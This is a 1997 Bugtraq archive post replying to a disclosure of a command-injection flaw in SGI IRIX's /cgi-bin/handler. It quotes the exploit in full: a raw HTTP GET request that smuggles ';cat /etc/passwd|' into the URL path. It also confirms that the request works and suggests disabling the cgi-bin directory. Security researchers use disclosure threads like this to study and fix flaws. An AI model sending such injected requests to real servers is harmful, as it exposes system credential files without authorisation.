Bugtraq mailing list archives

Re: Bug in SGI's /cgi-bin/handler

From: yarony () vipe technion ac il (Yaron Yanay)
Date: Sun, 15 Jun 1997 13:49:01 +0300


On Sun, 15 Jun 1997, Razvan Dragomirescu wrote:
:The way to exploit this "feature" for cgi-bin/handler is:

:telnet target.machine.com 80
:GET /cgi-bin/handler/useless_shit;cat   /etc/passwd|?data=Download
:HTTP/1.0

:I tested it on two Indy machines with IRIX 6.2. I would appreciate any
:feedback from you.

It worked on my IRIX 5.3 machines.
my fix: chmod 0 /var/www/cgi-bin
        Yaron.
                           \\\|///
                         \\  - -  //
                          (  @ @  )
+-----------------------oOOo-(_)-oOOo-------------+
| Yaron Yanay.  email:yarony () yarony il eu org     |
|                     yarony () tx technion ac il    |
|               http://www.technion.ac.il/~yarony |
|               http://yarony.il.eu.org           |
+-------------------------------Oooo--------------+
                         oooO   (   )
                        (   )    ) /
                         \ (    (_/
                          \_)

Current thread:

qmail-dos-2.c, another denial of service attack, (continued)
- qmail-dos-2.c, another denial of service attack Frank DENIS -Jedi/Sector One- (Jun 11)
- DNS abuse Jordi Murgo (Jun 11)
- Solaris x86 buffer overflows jim bresler (Jun 12)
- CERT Advisory CA-97.18 - Vulnerability in the at(1) program Aleph One (Jun 12)
  - Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Rick Byers (Jun 12)
    - Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program The Nolander (Jun 12)
    - Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Thomas Koenig (Jun 14)
    - Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Adam Morrison (Jun 15)
    - Netscape Exploit root (Jun 14)
    - Bug in SGI's /cgi-bin/handler Razvan Dragomirescu (Jun 14)
    - Re: Bug in SGI's /cgi-bin/handler Yaron Yanay (Jun 15)
    - sendmail 8.8.6 released Eric Allman (Jun 14)
    - Re: Netscape Exploit Roger Espel Llima (Jun 14)
    - Re: Netscape Exploit Micah Brandon (Jun 14)
    - Re: Netscape Exploit Manoj Kasichainula (Jun 15)
    - rshd gives away usernames David Holland (Jun 13)
    - Re: rshd gives away usernames Erik Troan (Jun 13)
    - Re: rshd gives away usernames Eric (Jun 13)
    - Re: rshd gives away usernames Todd C. Miller (Jun 13)
    - Re: rshd gives away usernames Alan Brown (Jun 14)
    - Changing default UMASK for all daemons Dax Kelson (Jun 13)

(Thread continues...)